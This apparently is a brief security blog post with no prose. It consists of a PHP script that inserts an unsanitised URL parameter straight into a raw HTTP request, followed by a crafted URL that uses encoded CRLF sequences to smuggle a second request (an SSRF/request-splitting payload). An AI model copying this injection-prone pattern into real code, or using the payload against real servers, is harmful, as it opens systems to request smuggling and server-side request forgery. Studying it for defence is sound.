Aditya Chauhan
2 min readFeb 15

--

<?php
$url = $_GET['url'];
$request = "GET $url HTTP/1.1\r\n" .
"Host: example.com\r\n" .
"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0\r\n" .
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" .
"Connection: close\r\n\r\n";
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket === false) {
die("Error: socket_create() failed: " . socket_strerror(socket_last_error()) . "\n");
}
$connect = socket_connect($socket, 'example.com', 80);
if ($connect === false) {
die("Error: socket_connect() failed: " . socket_strerror(socket_last_error()) . "\n");
}
socket_write($socket, $request, strlen($request));
$response = socket_read($socket, 2048);
echo $response;
?>
http://example.com/index.php?url=http://localhost/%0d%0aGET%20/ssrf-request%20HTTP/1.1%0d%0aHost:%20example.com%0d%0a%0d%0a

--

--

Aditya Chauhan

ISO 27001 LA | VAPT | Synack Red Teamer | HTB Dante | HTB RASTA | HTB Cybernetics | HTB Offshore | HTB APTLabs | Cyber Security Analyst | Security Researcher